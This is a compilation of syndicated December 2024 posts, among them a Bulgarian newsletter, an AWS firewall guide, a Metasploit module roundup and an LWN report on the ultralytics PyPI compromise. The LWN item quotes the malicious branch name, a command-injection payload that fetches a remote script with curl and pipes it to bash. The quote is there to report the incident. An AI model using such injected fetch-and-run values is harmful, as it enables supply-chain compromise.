Yearly Archives: 2024

Седмицата (2–7 декември)

Post Syndicated from Боряна Телбис original https://www.toest.bg/sedmitsata-2-7-dekemvri/

Седмицата (2–7 декември)

Да ме прощават софистицираните читатели на „Тоест“, че ще започна тазседмичния бюлетин така, но искам да се върна към една градска легенда. Пернишка градска легенда, ако трябва да сме по-точни. Твърди се – аз не съм го виждала с очите си, но много хора са, – че на стадиона на „Миньор“ (Перник), по-известен като Стадиона на мира, някога пишело: К*Р ЗА ХОРАТА. С големи четливи букви на едната стена до трибуните. 

И преди да побегнете, съвсем справедливо отвратени от тази простащина, постойте да ви обясня защо го разказвам. 

Представяте ли си до каква степен трябва да е бил отчаян лирическият герой, за да вдигне толкова голям среден пръст на цялото човечество и да пожелае да увековечи това с надпис на стената. За да може всички, които влизат на стадиона и заемат местата си по трибуните, да го видят и да усетят тази безнадеждност.

А сега бъдете честни пред себе си и си споделете тихичко и насаме дали докато подритваме поредния „исторически и безпрецедентен момент“, през който минаваме колективно като общество, не ви се приисква от време на време да дадете воля на чувствата си като незнайният герой от Перник? Може и да не е с тези думи. Може и да не е с надпис на стената. Даже препоръчително е да не е нито с тези думи, нито на подобно място, обаче човек трябва понякога да размаха юмрук към нищото и да му се закани, да го пита: „Това ли е? Толкова ли можем? Има ли как да са иначе нещата?“ И когато тези въпроси виснат над главите на всички ни, когато почнем да ги тъпчем по автобусите, да си лягаме с тях, да влизаме с тях в ресторантите и да вдигаме наздравици, докато ни танцуват по прическите, тогава ще намерим общностната сила да поискаме да им отговорим.

И през отговорите ще пропълзи промяната.

Дотогава ще завиваме кротко децата си вечер и в лицата им ще намираме утеха за всичко, което сме чули по новините. Ще се убеждаваме, че разумът ни още е здрав, че не всичко е загубено. Нищо че в страна от ЕС в XXI век има болници и родилни отделения на ротационен принцип. Нищо че отново събираме пари за „Българската Коледа“ – кампания самопризнание за абсолютната държавна безпомощност по линия на здравеопазването. Нищо че в половин България няма нормална течаща вода, защото „снегът се топял бавно“ (?!). Нищо че поредна жена е с опасност за живота след тежък побой, нанесен ѝ от мъжа, с когото съжителства на семейни начала от 20 години. 

Нищо. 

Важното е, че след 26 дни първо заседание парламентът вече си има председател – Наталия Киселова.

Изборът очевидно не беше лесен и между гласуванията станаха ясни всякакви интересни неща, например че човек може да e принципен, но без да прекалява. Явор Божанков, изглежда, не го беше разбрал и продължи да гласува по съвест, заради което от ПП му поискаха оставката. Текстът на Светла Енчева тази седмица „Константата Явор Божанков“ е посветен тъкмо на този казус.

Кризата в държавата помогна на протеста във Велинградско, който целеше да спаси от евтаназиране 1760 овце, да се увенчае с успех. Очевидно и Министерството на вътрешните работи, и Министерството на земеделието и храните не разполагат нито със силите, нито с желанието да се намесват и да налагат волята на държавата насила. Не че не сме виждали как го прави МВР покрай колоните на Министерския съвет например.

Просто сега не е подходящо. По темата разсъждава Емилия Милчева в текста си „В битката за власт спечелиха овцете“.

До известна степан пак за битката за власт, но по-глобално погледнато, става въпрос и в материала на Милена Делева „Европа за европейците, България за българите, Америка за американците?“. Милена дебютира в „Тоест“ с разсъждения за ксенофобията, расизма, антисемитизма и ислямофобията. 

Още един нов автор се изявява на страниците на медията тази седмица. Мартин Димов поставя началото на сътрудничеството ни с „Екипът на София“ в рамките на рубрика, в която ще разискваме най-различни градски теми. В „Колко е трудно да бъдеш етажна собственост. И как може да е иначе“ Мартин обяснява какво може да се направи, за да ни е по-лесно на всички да съжителстваме едни с други. 

Общото ни съжителство донякъде се улеснява в периоди на празници – може би защото тогава сме по-склонни да сме по-добри едни към други или просто защото ни няма на територията на етажната собственост. Така или иначе, задават се празници и е редно да знаем как да си ги честитим грамотно. На помощ идва порцията език на Павлина Върбанова, която тази седмица носи шеметното заглавие „Не сме безгрешни, но сме коледни“.

Още един текст от регулярна месечна рубрика – за молекулярна биология – имаме тази седмица в „Тоест“. В материала си „За борбата на науката с ХИВ“ Анастасия Орманджиева разглежда неимоверните усилия и изключителните научни достижения, заради които днес има терапия за ХИВ. Анастасия ни разказва за историята на заболяването, както и за неговия механизъм и възможности за лечение.

Завършваме седмицата с чудесно „На второ четене“ от Стефан Иванов. В него става дума за книгата на португалеца Гонсало М. Тавареш „Матео остана без работа“

Помнех, че Марин Бодаков ми е говорил за тази книга. Но бях забравил, че е говорил за нея и във видео. Отне ми два часа да се насиля да го пусна. Беше ми трудно. Прозорецът стоеше отворен, но просто не го пусках. Не знаех как ще реагирам, когато отново го чуя и видя, а няма как това да се случи отново в живота ми в плът и кръв. Едно от тези неща, съвпадения, синхроничности, които те изваждат от релси и те нокаутират.

Оставям ви с този откъс от текста на Стефан и ви желая съвпадения, които да ви поставят на мястото ви. 

Ако работата на екипа на „Тоест“ ви харесва, ще се радваме да ни подкрепите, защото медията ни се издържа изцяло и единствено от читателски дарения.

Подкрепете ни

Friday Squid Blogging: Safe Quick Undercarriage Immobilization Device

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/12/friday-squid-blogging-safe-quick-undercarriage-immobilization-device.html

Fifteen years ago I blogged about a different SQUID. Here’s an update:

Fleeing drivers are a common problem for law enforcement. They just won’t stop unless persuaded­—persuaded by bullets, barriers, spikes, or snares. Each option is risky business. Shooting up a fugitive’s car is one possibility. But what if children or hostages are in it? Lay down barriers, and the driver might swerve into a school bus. Spike his tires, and he might fishtail into a van­—if the spikes stop him at all. Existing traps, made from elastic, may halt a Hyundai, but they’re no match for a Hummer. In addition, officers put themselves at risk of being run down while setting up the traps.

But what if an officer could lay down a road trap in seconds, then activate it from a nearby hiding place? What if—­like sea monsters of ancient lore­—the trap could reach up from below to ensnare anything from a MINI Cooper to a Ford Expedition? What if this trap were as small as a spare tire, as light as a tire jack, and cost under a grand?

Thanks to imaginative design and engineering funded by the Small Business Innovation Research (SBIR) Office of the U. S. Department of Homeland Security’s Science and Technology Directorate (S&T), such a trap may be stopping brigands by 2010. It’s called the Safe Quick Undercarriage Immobilization Device, or SQUID. When closed, the current prototype resembles a cheese wheel full of holes. When open (deployed), it becomes a mass of tentacles entangling the axles. By stopping the axles instead of the wheels, SQUID may change how fleeing drivers are, quite literally, caught.

Blog moderation policy.

AWS Network Firewall Geographic IP Filtering launch

Post Syndicated from Prasanjit Tiwari original https://aws.amazon.com/blogs/security/aws-network-firewall-geographic-ip-filtering-launch/

AWS Network Firewall is a managed service that provides a convenient way to deploy essential network protections for your virtual private clouds (VPCs). In this blog post, we discuss Geographic IP Filtering, a new feature of Network Firewall that you can use to filter traffic based on geographic location and meet compliance requirements.

Customers with internet-facing applications are constantly in need of advanced security features to protect their applications from threat actors. This includes restricting traffic to and from their workloads in Amazon Web Services (AWS) to certain geographies because of security risk. Customers operating in highly regulated industries—such as banking, public sector, or insurance—might have specific security requirements that can be addressed by Geographic IP Filtering.

Previously, customers had to rely on third-party tools for retrieving an IP address list of specific countries and updating their firewall rules on a regular basis to meet applicable requirements. Now, with Geographic IP Filtering on Network Firewall, you can protect your application workloads based on the geolocation of the IP address. As new IP addresses are assigned by the Internet Assigned Numbers Authority (IANA), the Geographic IP database underneath Network Firewall is automatically updated so that the service can consistently filter inbound and outbound traffic from specific countries based on country codes. It supports IPv4 and IPv6 traffic.

Geographic IP Filtering is supported in all AWS Regions where Network Firewall is available today, including the AWS GovCloud (US) Regions.

Set up Geographic IP Filtering in Network Firewall

You can use Network Firewall to inspect network traffic and protect your VPCs using layer 3–7 rules (network layer to application layer of the OSI model). When traffic reaches Network Firewall, it will identify the location of the source and destination IP address from the Geographic IP database and block traffic if you have a firewall rule to block that location. You can choose to pass, drop, reject, or create an alert for traffic coming from or going to specific countries.

Before setting up Geographic IP Filtering rules, you need to deploy Network Firewall and attach a firewall policy. You can learn more about these steps in the Network Firewall Getting Started guide. You can configure Network Firewall Geographic IP Filtering in minutes using the AWS Management Console, AWS Command Line Interface (AWS CLI), AWS SDK, or the Network Firewall API.

To configure Geographic IP Filtering rules using the console:

  1. Sign in to the AWS Management Console and open the Amazon VPC console.
  2. In the navigation pane, under Network Firewall, choose Network Firewall rule groups.
  3. Choose Create rule group.
  4. In the Create rule group page, for the Rule group type, select Stateful rule group.
  5. For the Rule group format, select Standard stateful rule.
  6. For Rule evaluation order, select either Strict order (recommended) or Action order.
  7. Enter a name for the stateful rule group.
  8. For Capacity, enter the maximum capacity you want to allow for the stateful rule group.
  9. Under Standard stateful rules, for Geographic IP Filtering, select whether you want to Disable Geographic IP filtering, Match only selected countries, or Match all but selected countries.
  10. If you opt for Geographic IP Filtering, then select the Geographic IP traffic direction and Country codes that you want to filter the traffic for.
  11. Enter the appropriate values for Protocol, Source, Source port, Destination, and Destination port.
  12. For Action, select the action that you want Network Firewall to take when a packet matches the rule settings.

    Figure 1: Standard stateful rule

    Figure 1: Standard stateful rule

  13. Click Add rule and then review the rule to create the rule group.

    Figure 2: Geographic IP Filtering rules

    Figure 2: Geographic IP Filtering rules

Suricata compatibility

You can also use Geographic IP filtering with Suricata-compatible rule strings using the geoip keyword.

To create a Suricata compatible rule string:

  1. Follow steps 1 through 4 of the previous procedure.
  2. For the Rule group format, select Suricata compatible rule string.
  3. For Rule evaluation order, select either Strict order (recommended) or Action order.
  4. Enter a name for the stateful rule group.
  5. For Capacity, enter the maximum capacity you want to allow for the stateful rule group.
  6. Under Suricata compatible rule string, enter an appropriate string based on your source and destination along with the country code to filter traffic for. To use a Geographic IP filter, provide the geoip keyword, the filter type, and the country codes for the countries that you want to filter for.
  7. Suricata supports filtering for source and destination IPs. You can filter on either of these types by itself, by specifying dst or src. You can filter on the two types together with AND or OR logic, by specifying both or any.

For example, the following sample Suricata rule string drops traffic originating from Japan:

drop ip any any -> any any (msg:"Geographic IP from JP,Japan"; geoip:src,JP; sid:55555555; rev:1;)

Note that Suricata determines the location of requests using MaxMind GeoIP databases. MaxMind reports very high accuracy of their data at the country level, although accuracy varies according to factors such as country and type of IP. For more information about MaxMind, see MaxMind IP Geolocation.

If you think any of the Geographic IP data is incorrect, you can submit a correction request to MaxMind at MaxMind Correct GeoIP Data.

Logging Geographic IP Filtering

You can configure Network Firewall logging for your firewall’s stateful engine to get detailed information about the packet and any stateful rule action taken against the packet. There are no changes to the logging and monitoring mechanism with the introduction of the Geographic IP Filtering feature. However, by explicitly specifying the msg and metadata keywords, you can see additional geographic information in the alert logs that can help with troubleshooting. If these keywords aren’t specified in the Suricata rule string, the log event will not show any geographic information.

Suricata rule examples

In this section, you will find examples of Suricata rule strings to pass, block, reject, and alert on traffic to or from a specific country.

Example 1: To pass ingress traffic from a specific country

The following example passes ingress traffic from India.

Note: The rule evaluation order should be set to Strict for alert logs to be generated in this example. If the rule evaluation order is set to Action, then although the traffic will pass, alert logs will not be generated.

alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress traffic from IN allowed"; flow:to_server; geoip:src,IN; metadata:geo IN; sid:202409301;)
pass ip $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress traffic from IN allowed"; flow:to_server; geoip:src,IN; metadata:geo IN; sid:202409302;)

The following are the alert and flow logs for Example 1.

Alert logs:

{
    "firewall_name": "Test-NFW",
    "availability_zone": "eu-north-1a",
    "event_timestamp": "1731102856",
    "event": {
        "src_ip": "13.127.20.X",
        "src_port": 56630,
        "event_type": "alert",
        "alert": {
            "severity": 3,
            "signature_id": 202409301,
            "rev": 0,
            "metadata": {
                "geo": ["IN"]
            },
            "signature": "Ingress traffic from IN allowed",
            "action": "allowed",
            "category": ""
        },
        "flow_id": 234143298308779,
        "dest_ip": "172.31.2.4",
        "proto": "TCP",
        "verdict": {
            "action": "pass"
        },
        "dest_port": 80,
        "pkt_src": "geneve encapsulation",
        "timestamp": "2024-11-08T21:54:16.972019+0000",
        "direction": "to_server"
    }
}

Flow logs from source to destination:

{
    "firewall_name": "Test-NFW",
    "availability_zone": "eu-north-1a",
    "event_timestamp": "1731102918",
    "event": {
        "tcp": {
            "tcp_flags": "13",
            "syn": true,
            "fin": true,
            "ack": true
        },
        "app_proto": "unknown",
        "src_ip": "13.127.20.X",
        "src_port": 56630,
        "netflow": {
            "pkts": 4,
            "bytes": 216,
            "start": "2024-11-08T21:54:16.972019+0000",
            "end": "2024-11-08T21:54:17.263030+0000",
            "age": 1,
            "min_ttl": 112,
            "max_ttl": 112
        },
        "event_type": "netflow",
        "flow_id": 234143298308779,
        "dest_ip": "172.31.2.4",
        "proto": "TCP",
        "dest_port": 80,
        "timestamp": "2024-11-08T21:55:18.257416+0000"
    }
}

Flow logs from destination to source:

{
    "firewall_name": "Test-NFW",
    "availability_zone": "eu-north-1a",
    "event_timestamp": "1731102918",
    "event": {
        "tcp": {
            "tcp_flags": "13",
            "syn": true,
            "fin": true,
            "ack": true
        },
        "app_proto": "unknown",
        "src_ip": "172.31.2.4",
        "src_port": 80,
        "netflow": {
            "pkts": 2,
            "bytes": 112,
            "start": "2024-11-08T21:54:16.972019+0000",
            "end": "2024-11-08T21:54:17.263030+0000",
            "age": 1,
            "min_ttl": 126,
            "max_ttl": 126
        },
        "event_type": "netflow",
        "flow_id": 234143298308779,
        "dest_ip": "13.127.20.X",
        "proto": "TCP",
        "dest_port": 56630,
        "timestamp": "2024-11-08T21:55:18.257449+0000"
    }
}

Example 2: To block ingress traffic from a specific country

The following example blocks ingress traffic from Japan.

drop ip $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress traffic from JP blocked"; flow:to_server; geoip:any,JP; metadata:geo JP; sid:202409303;)

Example 3: To block ingress SSH traffic from a specific country

The following example blocks ingress SSH traffic from Russia.

drop ssh $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress SSH traffic from RU blocked"; flow:to_server; geoip:src,RU; metadata:geo RU; sid:202409304;)

Example 4: To reject egress TCP traffic to a specific country:

The following example rejects egress TCP traffic to Iran.

reject tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Egress traffic to IR rejected"; flow:to_server; geoip:dst,IR; metadata:geo IR; sid:202409305;)

Example 5: To alert on traffic originating from or destined to specific country

The following example alerts on traffic that originates from Venezuela.

alert ip any any -> any any (msg:"Geographic IP is from VE, Venezuela"; geoip:any,VE; sid: 202409306;)

Conclusion

You can use the new Geographic IP Filtering feature in AWS Network Firewall to enhance your security posture by controlling traffic based on geographic locations. In this post, you learned about the key concepts, configuration steps, and examples for implementing the Geographic IP Filtering feature in Network Firewall. By using this feature, businesses can protect their networks from potentially harmful traffic and control which geographic locations can interact with their infrastructure. As cyber threats continue to evolve, the Geographic IP Filtering feature serves as a vital tool for strengthening network security.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
 

Prasanjit Tiwari
Prasanjit Tiwari

Prasanjit is a Cloud Support Engineer II based out of Virginia, USA. He has a Master of Science in Telecommunications Engineering from the University of Maryland. He is a WAF and Route 53 subject matter expert and enjoys working on networking and perimeter security services. He is enthusiastic about using innovative solutions to address customer challenges.
Dhiren Patel
Dhiren Patel

Dhiren is a Cloud Support Engineer-II based out of Virginia, USA. He has a Master of Science in Electrical and Computer Engineering from New York University. As a WAF and Route 53 subject matter expert, he specializes in AWS networking and security services. He’s passionate about helping customers solve their AWS issues and get the best cloud experience possible through AWS.

Metasploit Weekly Wrap-Up 12/06/2024

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2024/12/06/metasploit-weekly-wrap-up-44/

Post-Thanksgiving Big Release

Metasploit Weekly Wrap-Up 12/06/2024

This week’s release is an impressive one. It adds 9 new modules, which will get you remote code execution on products such as Ivanti Connect Secure, VMware vCenter Server, Asterisk, Fortinet FortiManager and Acronis Cyber Protect. It also includes an account takeover on WordPress, a local privilege escalation on Windows and a X11 keylogger module. Finally, this release improves the fingerprinting logic for the TeamCity login module and adds instructions about the installation of the Metasploit development environment on windows using Powershell in the official documentation. A big thank you to the community for this awesome release!

New module content (9)

WordPress POST SMTP Account Takeover

Authors: Ulysses Saicha and h00die
Type: Auxiliary
Pull request: #19596 contributed by h00die
Path: admin/http/wp_post_smtp_acct_takeover
AttackerKB reference: CVE-2023-6875

Description: The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress, plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This adds an exploit module which allows an attacker to reset the password of any known user on the system.

X11 Keylogger

Authors: h00die and nir tzachar
Type: Auxiliary
Pull request: #18877 contributed by h00die
Path: gather/x11_keyboard_spy
AttackerKB reference: CVE-1999-0526

Description: This adds a new X11 library and module that uses it to remotely capture key presses from open X servers.

Chamilo v1.11.24 Unrestricted File Upload PHP Webshell

Authors: Ngo Wei Lin and jheysel-r7
Type: Exploit
Pull request: #19629 contributed by jheysel-r7
Path: linux/http/chamilo_bigupload_webshell
AttackerKB reference: CVE-2023-4220

Description: This adds an exploit module for Chamilo LMS, where versions prior to 1.11.24, a webshell can be uploaded via the bigload.php endpoint allowing remote code execution in the context of www-data (CVE-2023-4220).

Ivanti Connect Secure Authenticated Remote Code Execution via OpenSSL CRLF Injection

Authors: Christophe De La Fuente and Richard Warren
Type: Exploit
Pull request: #19595 contributed by cdelafuente-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2024_37404
AttackerKB reference: CVE-2024-37404

Description: Adds an exploit module for a CRLF injection vulnerability in Ivanti Connect Secure to achieve remote code execution. Versions prior to 22.7R2.1 and 22.7R2.2 are vulnerable. Ivanti Policy Secure versions prior to 22.7R1.1 are also vulnerable but this module doesn’t support this software. Valid administrative credentials are required. A non-administrative user is also required and can be created using the administrative account, if needed. Also the Client Log Upload feature needs to be enabled. This can also be done using the administrative interface if it is not enabled already.

vCenter Sudo Privilege Escalation

Authors: Matei "Mal" Badanoiu and h00die
Type: Exploit
Pull request: #19402 contributed by h00die
Path: linux/local/vcenter_sudo_lpe
AttackerKB reference: CVE-2024-37081

Description: VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. This adds a post module to exploit these vulnerabilities.

Asterisk AMI Originate Authenticated RCE

Authors: Brendan Coles [email protected], NielsGaljaard, and h00die
Type: Exploit
Pull request: #19613 contributed by h00die
Path: linux/misc/asterisk_ami_originate_auth_rce
AttackerKB reference: CVE-2024-42365

Description: Adds an authenticated RCE module for Asterisk via AMI. This vulnerability is tracked as CVE-2024-42365. This also moves the underlying functionality that enables the module to interact with the Asterisk application, originally written by @bcoles, to a library.

Fortinet FortiManager Unauthenticated RCE

Author: sfewer-r7
Type: Exploit
Pull request: #19648 contributed by sfewer-r7
Path: linux/misc/fortimanager_rce_cve_2024_47575
AttackerKB reference: CVE-2024-47575

Description: Adds a module that exploits a missing authentication vulnerability affecting FortiManager and FortiManager Cloud devices to achieve unauthenticated RCE with root privileges. This vulnerability is being tracked as CVE-2024-47575.

Acronis Cyber Protect/Backup remote code execution

Authors: Sandro Tolksdorf of usd AG. and h00die-gr3y [email protected]
Type: Exploit
Pull request: #19583 contributed by h00die-gr3y
Path: multi/acronis_cyber_protect_unauth_rce_cve_2022_3405
AttackerKB reference: CVE-2022-3405

Description: This exploits an RCE and sensitive information disclosure vulnerability due to excessive privileges assigned to Acronis Agent. The following products are affected: Acronis Cyber Protect 15 before build 29486, Acronis Cyber Backup 12.5 before build 16545.

Windows Access Mode Mismatch LPE in ks.sys

Authors: AngelBoy, jheysel-r7, and varwara
Type: Exploit
Pull request: #19574 contributed by jheysel-r7
Path: windows/local/cve_2024_35250_ks_driver
AttackerKB reference: CVE-2024-35250

Description: This adds a post module to gain NT AUTHORITY/SYSTEM privileges on a Windows target vulnerable to CVE-2024-35230.

Enhancements and features (1)

  • #19684 from sjanusz-r7 – Improves the fingerprinting logic for the auxiliary/scanner/teamcity/teamcity_login module.

Documentation added (1)

  • #19622 from soroshsabz – This improves the Metasploit development environment installation documentation by adding Powershell instructions on Windows 10 and earlier.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

AI Servers Robot Dogs and Liquid Cooling at the ASUS SC24 Booth

Post Syndicated from Patrick Kennedy original https://www.servethehome.com/asus-sc24-ai-servers-liquid-cooling-cpu-gpu-robot-dog-intel-amd-nvidia/

We take a quick look at some of the unique servers in the ASUS SC24 booth ranging from AI, to storage, to dense compute, and even a robot dog

The post AI Servers Robot Dogs and Liquid Cooling at the ASUS SC24 Booth appeared first on ServeTheHome.

Abusing Git branch names to compromise a PyPI package

Post Syndicated from daroc original https://lwn.net/Articles/1001215/

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account

“OpenIM Robot”
(which appears to be controlled by
Xinwei Xiong) opened
a pull request for the

ultralytics
Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the
pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository’s secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.

This problem has been
known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.

Efficient satellite imagery supply with AWS Serverless at BASF Digital Farming GmbH

Post Syndicated from Kevin S. Ridolfi original https://aws.amazon.com/blogs/architecture/efficient-satellite-imagery-supply-with-aws-serverless-at-basf-digital-farming-gmbh/

This post was co-written with Dr. Jan Melchior at BASF Digital Farming GmbH and xarvio Digital Farming Solutions.

BASF Digital Farming’s mission is to support farmers worldwide with cutting-edge digital agronomic decision advice by using its main crop optimization platform, xarvio FIELD MANAGER. This necessitates providing the most recent satellite imagery available as quickly as possible. This blog post describes the serverless architecture developed by BASF Digital Farming for efficiently downloading and supplying satellite imagery from various providers to support its xarvio platform.

Screenshot showing the xarvio Field Manager platform

Figure 1. Screenshot showing the xarvio Field Manager platform

Architecture

Figure 2 shows the serverless architecture implemented with AWS services for downloading and processing satellite imagery. The subscription management components handle subscription creation, updates, and deletions, while the actual data downloading and processing occurs in AWS Step Functions.

Serverless implementation of the new imagery service

Figure 2. Serverless implementation of the new imagery service

  1. Subscriptions are created using Amazon API Gateway for external API access, which provides request throttling and can be used to manage API request authorizations.
  2. An AWS Lambda API function manages subscriptions. It implements common create, read, update, and delete operations with request validations and provides an endpoint for replaying failed requests. Subscriptions contain geometry, data provider, as well as start and end date and other parameters, which are stored in the subscription database (Step 7) before a message is sent out for processing.
    Notice that the entire architecture is serverless and thus allows for theoretically unbounded scaling. In case of a bug, this can lead to severe cost impacts, so we implemented a safety buffer, which enables us to prioritize and limit the number of Step Functions executions of the processing pipeline.
  3. All requests (such as the initial request for imagery when a subscription is created) are sent to the Amazon Simple Queue Service (Amazon SQS) processing queue first, which functions as a processing buffer and allows for request prioritization.
  4. Subsequently, Amazon EventBridge Pipes connects the processing buffer with AWS Step Functions. It handles pipe-internal errors automatically; for example, when the Step Functions concurrency limit is reached, the invocation will be retired automatically. This does not handle exceptions raised within Step Functions, such as runtime errors.
  5. AWS Step Functions then performs the actual downloading, processing, and ingestion to the STAC catalog of satellite data from different providers. In case of failure, the request message with error description is sent to the failure queue.
  6. Step Functions uploads the data to Amazon Simple Storage Service (Amazon S3), which stores satellite imagery data.
  7. Following this, Step Functions updates the subscriptions in the Amazon DynamoDB-based subscription database, which stores relevant metadata, such as start and end date, boundary, provider, collection, and last update.
  8. A notification is sent out to inform the user that new data is available through Amazon Simple Notification Service (Amazon SNS), which informs users and services about any updates on a subscription, such as new data being available or subscriptions having been created, deleted, updated, or having failed.
  9. Next, the data is published to our internal STAC catalog, which registers the satellite imagery and makes it directly accessible for subsequent processing.
  10. In case of failed Step Functions execution in Step 5, the Amazon SQS-based failure queue buffers failed executions. Failure messages contain the error message and request body. Depending on error reasons, they can be replayed using the corresponding API endpoint, enabling reprocessing through the replay endpoint on the API Lambda function. The endpoint also allows users to filter messages based on their failure type and to delete messages that cannot be replayed.
  11. An update checker, built on AWS Lambda, regularly checks whether a subscription can be updated. It is triggered in conjunction with an event scheduler every 5 minutes, checks the database for subscriptions that can be updated, and sends update request messages to the processing buffer. Besides actively checking resources, such as API endpoints and STAC catalogs, it also sends out an update message if a notification was received, for example, through an external notification service.
  12. Finally, a delete checker, also built on AWS Lambda, identifies subscriptions that can be deleted. It is triggered in conjunction with an event scheduler every 12 hours. It regularly checks the database for subscriptions that can be deleted and removes them from the database, the S3 bucket, and the STAC catalog. As a safety mechanism, a subscription will first be marked for deletion for 6 months before it gets deleted.

Imagery step function

The actual downloading and processing of data from different providers is handled by the imagery function, illustrated for two different providers (Public and Planet) in Figure 3.

Diagram showing detail state machine for the Imagery Step Function

Figure 3. Diagram showing detail state machine for the Imagery Step Function

  1. When a request arrives, the provider choice state determines the provider from the request body, depending on which the Step Functions flow routes to different Lambda states.
  2. In case a public provider is selected (for example, Earth Search), the Public_Provider Lambda function downloads the data from STAC-based open data providers and directly uploads it to the S3 data bucket, as shown in Figure 2.
  3. In case Planet data is selected, the data retrieval involves an asynchronous call to an external API: First, the Planet_Requester sends an order to the Planet API, together with a task token for pausing Step Functions and the URL of the Planet_Webhook Lambda function.
  4. The Planet_Webhook function is invoked by Planet when the requested order is available for downloading. Given the transmitted task token, Step Functions is resumed with the next state.
  5. Subsequently, the Planet_Provider Lambda function downloads and processes the Planet data.
  6. For both public providers and Planet, the subsequent Public_Provider Lambda function updates the subscription database entries, as shown in Figure 2 (for example, with the latest available timestamp), and adds the download and processed data to the internal STAC catalog, before it ends in the Success state.
  7. If an error occurs in any of the Lambda functions (2, 3, 5, 6), an error message is prepared in the Error_Parsing If an unknown provider is handed in, an error message, including the request body, is prepared in the Error_Provider_Unknown state. In both cases, the error message is pushed to the Failure_Queue (refer to #10 of Figure 2), before it ends in the Failure state.

Conclusion

BASF Digital Farming GmbH developed a serverless architecture on AWS for efficiently downloading and supplying satellite imagery for use by its xarvio platform. This architecture led to a 5x faster delivery rate, an 80% cost reduction through on-demand data downloading, and a 3x accelerated development cycle. Future work will include optimizing the architecture, exploring additional AWS services, and onboarding more satellite imagery providers. Similar serverless architectures using AWS services like AWS Step Functions, AWS Lambda, and Amazon API Gateway can enhance flexibility, scalability, and cost efficiency in imagery provisioning. Learn more about AWS serverless offerings at aws.amazon.com/serverless.

[$] Freezing out the page reference count

Post Syndicated from corbet original https://lwn.net/Articles/1000654/

The page
structure sits at the core of the kernel’s memory-management subsystem
(for now), and a key part of that structure is its reference count, stored
in refcount. The page reference count tells the kernel how many
users a given page has and when it can be freed. That count is not needed
for every page in the system, though. Matthew Wilcox has recently resurrected
an old
patch set that expands the concept of a “frozen” page — one that lacks a
meaningful reference count — to the immediate benefit of the slab allocator
but in the service of a longer-term goal as well.

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/1001164/

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

Rapid7 Extends Cloud Security Capabilities with Updates to Exposure Command

Post Syndicated from Ryan Blanchard original https://blog.rapid7.com/2024/12/06/rapid7-extends-cloud-security-capabilities-with-updates-to-exposure-command/

Rapid7 Extends Cloud Security Capabilities with Updates to Exposure Command

The cloud has become the backbone of modern innovation, powering everything from AI to remote work. But as organizations embrace the cloud, they also face an ever-expanding and increasingly complex attack surface. With purpose-built harvesting technology providing real-time visibility into everything running across multi-cloud environments, Exposure Command from Rapid7 ensures teams have an up-to-date inventory, mapping their cloud attack surface and enriching asset data with risk and business context.

To ensure teams can keep up with the torrid pace of innovation and overcome increased complexity, Rapid7 remains dedicated to investing in advancing the cloud security capabilities available within Exposure Command. To that end, we’ve made a few significant updates across AI resource coverage, third-party CNAPP enrichment and more. Let’s dive right in.

Extending coverage for securing AI/ML development in the cloud

AI and machine learning (ML) are transforming industries, but the speed of adoption can often leave organizations vulnerable. AI/ML workloads often process sensitive or proprietary data, requiring robust protections to ensure compliance with ever-evolving regulations. Safeguarding these environments isn’t just about securing the infrastructure; it’s about understanding the unique workflows and ensuring compliance at every step.

These workloads also introduce unique risks, such as model poisoning attacks or vulnerabilities in APIs, creating new vectors for data exfiltration and service disruption. Additionally, the dynamic nature of cloud-hosted AI services presents challenges in maintaining secure configurations as resources scale elastically, potentially exposing sensitive endpoints or misconfigured setups.

To that end, Exposure Command has expanded support for critical AI services like Amazon Comprehend and Polly, AWS’s natural language processing and text-to-speech services.This provides comprehensive visibility across an organization’s attack surface, aligning AI-specific risks with broader enterprise priorities.

Shifting left and securing the software supply chain

Developers are at the forefront of modern cloud environments, making “shift-left” strategies essential for effective security. By addressing risks during development rather than after deployment, teams can eliminate vulnerabilities before they become costly issues.

Exposure Command now offers more robust Infrastructure-as-Code (IaC) scanning and deeper CI/CD integration, with Terraform and CloudFormation support across hundreds of resource types. For development teams, integrations like GitLab, GitHub Actions, AWS CloudFormation, and Azure DevOps bring security checks directly into their workflows. Whether it’s identifying misconfigurations in AWS Glue Catalogs or assessing risks in SES configurations, these tools help teams secure their code without breaking their stride.

